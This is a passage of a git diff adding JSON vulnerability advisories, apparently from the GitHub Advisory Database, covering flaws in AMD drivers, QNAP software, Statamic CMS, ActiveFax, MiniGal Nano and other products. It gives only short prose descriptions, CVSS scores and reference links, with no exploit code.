b/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json new file mode 100644 index 0000000000000..9620c3f39bd2f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vphr-3gfg-4g86", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2024-36324" + ], + "details": "Improper input validation in AMD Graphics Driver could allow an attacker to supply a specially crafted pointer, potentially leading to arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36324" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json b/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json new file mode 100644 index 0000000000000..6a3963273d962 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w44h-2j78-hvfm", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-47205" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3332 build 20251128 and later\nQuTS hero h5.2.8.3321 build 20251117 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47205" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json new file mode 100644 index 0000000000000..47aaaf830cc6f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w669-772h-5fh5", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54147" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54147" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json new file mode 100644 index 0000000000000..98a97fff4f3e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6g5-6qxq-f96f", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54161" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54161" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json b/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json new file mode 100644 index 0000000000000..3b487c3c24861 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wcq7-39gh-x6jv", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2337" + ], + "details": "A vulnerability in Plunet Plunet BusinessManager allows session hijacking, data theft, unauthorized actions on behalf of the user.This issue affects Plunet BusinessManager: 10.15.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2337" + }, + { + "type": "WEB", + "url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2026-2337" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json new file mode 100644 index 0000000000000..e4bcb20273ae6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4qx-g5c7-vgmf", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54169" + ], + "details": "An out-of-bounds read vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54169" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json b/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json new file mode 100644 index 0000000000000..1d842c194f44a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x522-cqqg-xqx7", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25310" + ], + "details": "ActiveFax Server 6.92 Build 0316 contains an unquoted service path vulnerability in the ActiveFaxServiceNT service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated administrative privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25310" + }, + { + "type": "WEB", + "url": "https://www.actfax.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47503" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/activefax-server-build-activefaxservicent-unquoted-service-path" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json new file mode 100644 index 0000000000000..c789a92d3c5c2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6mf-6c4h-p75j", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54155" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54155" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json new file mode 100644 index 0000000000000..9d8d6bf294653 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmr6-mm5f-8mf2", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-59386" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59386" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file From 0a388d71db3a362384846cfb6eb02ab0af3ea780 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 16:54:58 +0000 Subject: [PATCH 008/215] Publish GHSA-gwmx-9gcj-332h --- .../GHSA-gwmx-9gcj-332h.json | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json diff --git a/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json b/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json new file mode 100644 index 0000000000000..3f0e4f4840911 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gwmx-9gcj-332h/GHSA-gwmx-9gcj-332h.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwmx-9gcj-332h", + "modified": "2026-02-11T16:53:35Z", + "published": "2026-02-11T16:53:35Z", + "aliases": [ + "CVE-2026-25633" + ], + "summary": "Statamic CMS's missing authorization allows access to assets", + "details": "### Impact\nUsers without permission to view assets are able are able to download them and view their metadata.\n\nLogged-out users and users without permission to access the control panel are unable to take advantage of this.\n\n### Patches\nThis has been fixed in 5.73.6 and 6.2.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.73.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0-alpha.1" + }, + { + "fixed": "6.2.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/statamic/cms/security/advisories/GHSA-gwmx-9gcj-332h" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/pull/13883" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/commit/5a6f47246edf3a0c453727ffecbfa14333a6bc8a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/statamic/cms" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/releases/tag/v5.73.6" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/releases/tag/v6.2.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T16:53:35Z", + "nvd_published_at": null + } +} \ No newline at end of file From 01fe115fe7b880b45f6ee9d2ac4dd2dcc332923d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 18:19:43 +0000 Subject: [PATCH 009/215] Publish GHSA-ff9r-ww9c-43x8 --- .../GHSA-ff9r-ww9c-43x8.json | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json diff --git a/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json b/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json new file mode 100644 index 0000000000000..fce660056e3a7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-ff9r-ww9c-43x8/GHSA-ff9r-ww9c-43x8.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff9r-ww9c-43x8", + "modified": "2026-02-11T18:17:59Z", + "published": "2026-02-11T18:17:58Z", + "aliases": [ + "CVE-2026-25759" + ], + "summary": "Statamic CMS vulnerable to privilege escalation via stored cross-site scripting", + "details": "### Impact\nStored XSS vulnerability in content titles allow authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users.\n\nMalicious user must have an account with control panel access and content creation permissions.\n\nThis vulnerability can be exploited to allow super admin accounts to be created.\n\n### Patches\nThis has been fixed in 6.2.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/statamic/cms/security/advisories/GHSA-ff9r-ww9c-43x8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/statamic/cms" + }, + { + "type": "WEB", + "url": "https://github.com/statamic/cms/releases/tag/v6.2.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T18:17:58Z", + "nvd_published_at": null + } +} \ No newline at end of file From 85b1f2d220a881ee05e235a97a61d2a92b2ca37e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 18:33:54 +0000 Subject: [PATCH 010/215] Advisory Database Sync --- .../GHSA-856v-8qm2-9wjv.json | 6 ++- .../GHSA-23f5-mvxj-rqhr.json | 33 +++++++++++++ .../GHSA-44fr-rgw9-2p52.json | 44 +++++++++++++++++ .../GHSA-47fm-95xj-vfvg.json | 40 ++++++++++++++++ .../GHSA-6wm3-23gq-r92x.json | 44 +++++++++++++++++ .../GHSA-76gx-97cq-65f5.json | 36 ++++++++++++++ .../GHSA-92fh-27vv-894w.json | 37 ++++++++++++++ .../GHSA-9gvg-fw8p-72fv.json | 36 ++++++++++++++ .../GHSA-9jhc-rr6j-x87m.json | 41 ++++++++++++++++ .../GHSA-cpfh-q3v8-wj73.json | 36 ++++++++++++++ .../GHSA-f3pj-ph83-hp25.json | 3 +- .../GHSA-g3vf-cx4m-ph4q.json | 48 +++++++++++++++++++ .../GHSA-hfmq-6wjv-c7r3.json | 41 ++++++++++++++++ .../GHSA-j8fr-767f-7h52.json | 36 ++++++++++++++ .../GHSA-jh5g-w5hx-478p.json | 33 +++++++++++++ .../GHSA-m447-7fh7-88xc.json | 37 ++++++++++++++ .../GHSA-m9ff-h6c5-vghq.json | 15 ++++-- .../GHSA-mpr3-mc9x-rrgq.json | 40 ++++++++++++++++ .../GHSA-p229-4rm7-jjq6.json | 15 ++++-- .../GHSA-pc84-8mjq-pcg8.json | 15 ++++-- .../GHSA-pvgq-2pr4-wxj6.json | 15 ++++-- .../GHSA-qwvg-xq53-3vw2.json | 45 +++++++++++++++++ .../GHSA-r6ff-p4vx-28hv.json | 48 +++++++++++++++++++ .../GHSA-r6q3-ww97-px52.json | 44 +++++++++++++++++ .../GHSA-r8mq-23vx-xrgv.json | 3 +- .../GHSA-v66c-4xgf-59c7.json | 33 +++++++++++++ .../GHSA-vm49-qx2v-g672.json | 15 ++++-- .../GHSA-x2gm-g5r6-83jw.json | 15 ++++-- .../GHSA-xcpc-ffvj-qvhw.json | 40 ++++++++++++++++ .../GHSA-xrh7-29mh-fp98.json | 15 ++++-- 30 files changed, 878 insertions(+), 31 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-44fr-rgw9-2p52/GHSA-44fr-rgw9-2p52.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47fm-95xj-vfvg/GHSA-47fm-95xj-vfvg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6wm3-23gq-r92x/GHSA-6wm3-23gq-r92x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-76gx-97cq-65f5/GHSA-76gx-97cq-65f5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9gvg-fw8p-72fv/GHSA-9gvg-fw8p-72fv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9jhc-rr6j-x87m/GHSA-9jhc-rr6j-x87m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpfh-q3v8-wj73/GHSA-cpfh-q3v8-wj73.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g3vf-cx4m-ph4q/GHSA-g3vf-cx4m-ph4q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j8fr-767f-7h52/GHSA-j8fr-767f-7h52.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh5g-w5hx-478p/GHSA-jh5g-w5hx-478p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m447-7fh7-88xc/GHSA-m447-7fh7-88xc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mpr3-mc9x-rrgq/GHSA-mpr3-mc9x-rrgq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json diff --git a/advisories/github-reviewed/2025/08/GHSA-856v-8qm2-9wjv/GHSA-856v-8qm2-9wjv.json b/advisories/github-reviewed/2025/08/GHSA-856v-8qm2-9wjv/GHSA-856v-8qm2-9wjv.json index a70d00c7024ef..b60206f200d21 100644 --- a/advisories/github-reviewed/2025/08/GHSA-856v-8qm2-9wjv/GHSA-856v-8qm2-9wjv.json +++ b/advisories/github-reviewed/2025/08/GHSA-856v-8qm2-9wjv/GHSA-856v-8qm2-9wjv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-856v-8qm2-9wjv", - "modified": "2026-01-16T00:30:52Z", + "modified": "2026-02-11T18:31:25Z", "published": "2025-08-07T21:31:08Z", "aliases": [ "CVE-2025-7195" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-7195" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2572" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:0737" diff --git a/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json b/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json new file mode 100644 index 0000000000000..ba97f24215696 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23f5-mvxj-rqhr", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2025-65127" + ], + "details": "A lack of session validation in the web API component of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote unauthenticated attackers to access administrative information-retrieval functions intended for authenticated users. By invoking \"get_*\" operations, attackers can obtain device configuration data, including plaintext credentials, without authentication or an existing session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65127" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-65127" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T17:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-44fr-rgw9-2p52/GHSA-44fr-rgw9-2p52.json b/advisories/unreviewed/2026/02/GHSA-44fr-rgw9-2p52/GHSA-44fr-rgw9-2p52.json new file mode 100644 index 0000000000000..f65d840283600 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-44fr-rgw9-2p52/GHSA-44fr-rgw9-2p52.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44fr-rgw9-2p52", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2026-25869" + ], + "details": "MiniGal Nano versions 0.3.5 and prior contain a path traversal vulnerability in index.php via the dir parameter. The application appends user-controlled input to the photos directory and attempts to prevent traversal by removing dot-dot sequences, but this protection can be bypassed using crafted directory patterns. An attacker can exploit this behavior to cause the application to enumerate and display image files from unintended filesystem locations that are readable by the web server, resulting in unintended information disclosure.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25869" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/minigalnano" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20180330004313/http://www.minigal.dk/minigal-nano.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/minigal-nano-path-traversal-via-dir-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T16:16:06Z" + } +} \ No newline at end of file diff --git 